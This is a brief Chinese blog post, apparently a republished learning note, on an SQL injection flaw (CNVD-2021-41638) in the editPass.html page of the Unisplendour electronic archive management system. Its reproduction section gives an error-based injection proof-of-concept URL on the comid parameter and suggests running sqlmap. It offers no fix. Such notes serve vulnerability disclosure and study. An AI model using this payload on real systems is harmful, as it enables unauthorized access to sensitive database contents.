本文主要是介绍紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞描述:
紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
漏洞利用条件:
/
漏洞影响范围:
紫光电子档案管理系统
漏洞复现:
1.Poc:/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
2.sqlmap跑注入
修复建议:
/
学习记录过程仅供参考!!!
这篇关于紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
